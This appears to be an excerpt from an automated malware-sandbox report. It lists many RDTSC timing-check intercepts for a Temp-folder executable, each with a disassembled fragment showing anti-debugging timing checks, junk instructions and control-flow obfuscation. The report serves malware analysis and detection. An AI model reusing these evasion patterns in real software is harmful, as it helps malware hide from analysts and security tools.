Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FB649 second address: 8FB654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FC04F second address: 8FC082 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 jmp 00007FEE851EFD90h 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FC082 second address: 8FC112 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FEE84E88FC6h 0x00000009 je 00007FEE84E88FC6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov eax, dword ptr [eax] 0x00000014 jmp 00007FEE84E88FCBh 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d pushad 0x0000001e jnc 00007FEE84E88FD3h 0x00000024 jmp 00007FEE84E88FCDh 0x00000029 jmp 00007FEE84E88FD9h 0x0000002e popad 0x0000002f pop eax 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007FEE84E88FC8h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 0000001Ah 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a mov esi, ebx 0x0000004c call 00007FEE84E88FC9h 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FEE84E88FCDh 0x0000005a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FC112 second address: 8FC118 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FC118 second address: 8FC159 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b je 00007FEE84E88FCCh 0x00000011 ja 00007FEE84E88FC6h 0x00000017 push ebx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a pop ebx 0x0000001b popad 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 jmp 00007FEE84E88FD5h 0x00000025 mov eax, dword ptr [eax] 0x00000027 pushad 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FC715 second address: 8FC71F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FC71F second address: 8FC723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FCC80 second address: 8FCC84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FCC84 second address: 8FCC8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FCC8A second address: 8FCC94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FEE851EFD86h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FCDDB second address: 8FCDEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FCDEA second address: 8FCDEF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FCF73 second address: 8FCF9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jns 00007FEE84E88FC6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 jmp 00007FEE84E88FD8h 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FCF9E second address: 8FCFA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FCFA3 second address: 8FCFA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FD126 second address: 8FD134 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FD134 second address: 8FD138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FD138 second address: 8FD13E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FD13E second address: 8FD143 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FD19A second address: 8FD19E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FD19E second address: 8FD1A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FD1A4 second address: 8FD1AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FEE851EFD86h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FD299 second address: 8FD2AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE84E88FCEh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FD2AC second address: 8FD2E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jng 00007FEE851EFD86h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FEE851EFD88h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b mov di, ax 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FD2E3 second address: 8FD2E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FE120 second address: 8FE126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 901D92 second address: 901DAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007FEE84E88FC6h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 901DAB second address: 901DFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov esi, dword ptr [ebp+122D29BDh] 0x00000011 push 00000000h 0x00000013 mov dword ptr [ebp+122D1A06h], esi 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007FEE851EFD88h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push ebx 0x0000003b pop ebx 0x0000003c rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 901DFE second address: 901E08 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FEE84E88FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 901E08 second address: 901E0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 902A0C second address: 902A5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b pushad 0x0000000c jbe 00007FEE84E88FDCh 0x00000012 jmp 00007FEE84E88FD6h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FEE84E88FD6h 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 902A5F second address: 902ACC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FEE851EFD88h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push ebp 0x00000027 call 00007FEE851EFD88h 0x0000002c pop ebp 0x0000002d mov dword ptr [esp+04h], ebp 0x00000031 add dword ptr [esp+04h], 0000001Ch 0x00000039 inc ebp 0x0000003a push ebp 0x0000003b ret 0x0000003c pop ebp 0x0000003d ret 0x0000003e mov esi, ebx 0x00000040 push 00000000h 0x00000042 mov esi, dword ptr [ebp+122D2E36h] 0x00000048 xchg eax, ebx 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FEE851EFD8Fh 0x00000050 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 902ACC second address: 902AF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEE84E88FD7h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 902AF1 second address: 902AF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 901B09 second address: 901B20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE84E88FD3h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 902AF5 second address: 902AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9027BE second address: 9027C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90450A second address: 90450E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90450E second address: 904521 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FCFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 904521 second address: 90453E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FEE851EFD92h 0x0000000c jp 00007FEE851EFD86h 0x00000012 jc 00007FEE851EFD86h 0x00000018 pushad 0x00000019 push edx 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90453E second address: 904551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FEE84E88FC6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007FEE84E88FC6h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 904551 second address: 904557 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 904557 second address: 904570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 jmp 00007FEE84E88FCEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9031E0 second address: 903220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FEE851EFD86h 0x0000000a popad 0x0000000b jmp 00007FEE851EFD98h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FEE851EFD99h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 904570 second address: 904591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE84E88FD5h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90B913 second address: 90B918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90A8FE second address: 90A91E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEE84E88FD8h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90A91E second address: 90A922 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90A922 second address: 90A98B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FEE84E88FC8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov dword ptr [ebp+1248E95Bh], ebx 0x0000002a push dword ptr fs:[00000000h] 0x00000031 mov dword ptr [ebp+122D1B8Ah], edi 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e push ebx 0x0000003f mov edi, dword ptr [ebp+122D28C0h] 0x00000045 pop edi 0x00000046 mov eax, dword ptr [ebp+122D0D75h] 0x0000004c mov dword ptr [ebp+1245B9B6h], ebx 0x00000052 push FFFFFFFFh 0x00000054 clc 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FEE84E88FCAh 0x0000005d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90FBC6 second address: 90FBD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FEE851EFD8Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 910B1D second address: 910B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FEE84E88FC6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90DB1B second address: 90DB23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90FD75 second address: 90FD7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90EC60 second address: 90ED1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FEE851EFD88h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D19F3h], eax 0x0000002d jnp 00007FEE851EFD89h 0x00000033 push dword ptr fs:[00000000h] 0x0000003a jbe 00007FEE851EFD9Bh 0x00000040 jmp 00007FEE851EFD95h 0x00000045 mov dword ptr fs:[00000000h], esp 0x0000004c movsx ebx, dx 0x0000004f mov eax, dword ptr [ebp+122D16BDh] 0x00000055 sub bx, 896Bh 0x0000005a mov ebx, dword ptr [ebp+122D29C1h] 0x00000060 push FFFFFFFFh 0x00000062 push 00000000h 0x00000064 push ebx 0x00000065 call 00007FEE851EFD88h 0x0000006a pop ebx 0x0000006b mov dword ptr [esp+04h], ebx 0x0000006f add dword ptr [esp+04h], 00000016h 0x00000077 inc ebx 0x00000078 push ebx 0x00000079 ret 0x0000007a pop ebx 0x0000007b ret 0x0000007c mov edi, dword ptr [ebp+12463175h] 0x00000082 nop 0x00000083 push eax 0x00000084 push edx 0x00000085 jmp 00007FEE851EFD97h 0x0000008a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90ED1E second address: 90ED25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90FD7A second address: 90FDEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE851EFD8Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FEE851EFD91h 0x00000012 nop 0x00000013 mov edi, dword ptr [ebp+122D2A55h] 0x00000019 push dword ptr fs:[00000000h] 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 mov bh, 1Ch 0x00000029 mov eax, dword ptr [ebp+122D10C5h] 0x0000002f jmp 00007FEE851EFD97h 0x00000034 push FFFFFFFFh 0x00000036 sbb ebx, 744DD2E3h 0x0000003c nop 0x0000003d pushad 0x0000003e pushad 0x0000003f pushad 0x00000040 popad 0x00000041 push ebx 0x00000042 pop ebx 0x00000043 popad 0x00000044 jnc 00007FEE851EFD8Ch 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90ED25 second address: 90ED32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90ED32 second address: 90ED3B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 911AA3 second address: 911AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 911AA8 second address: 911AD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FEE851EFD99h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 912885 second address: 9128AB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 movzx edi, cx 0x0000000b push 00000000h 0x0000000d pushad 0x0000000e mov al, 0Dh 0x00000010 mov dh, 29h 0x00000012 popad 0x00000013 push 00000000h 0x00000015 mov dword ptr [ebp+122D2D3Ah], edi 0x0000001b xchg eax, esi 0x0000001c push eax 0x0000001d push edx 0x0000001e jc 00007FEE84E88FCCh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9128AB second address: 9128AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 91371E second address: 913739 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEE84E88FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEE84E88FCDh 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 914719 second address: 91471E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 915834 second address: 915838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 915838 second address: 9158A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a xor ebx, 4AB97091h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007FEE851EFD88h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c mov ebx, 34B53C63h 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 call 00007FEE851EFD88h 0x0000003b pop eax 0x0000003c mov dword ptr [esp+04h], eax 0x00000040 add dword ptr [esp+04h], 0000001Ah 0x00000048 inc eax 0x00000049 push eax 0x0000004a ret 0x0000004b pop eax 0x0000004c ret 0x0000004d add dword ptr [ebp+122D288Eh], eax 0x00000053 xchg eax, esi 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 je 00007FEE851EFD86h 0x0000005d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9158A3 second address: 9158AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9129EC second address: 9129F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9129F0 second address: 9129FA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FEE84E88FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 91392D second address: 913932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 911CB6 second address: 911CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e rdtsc
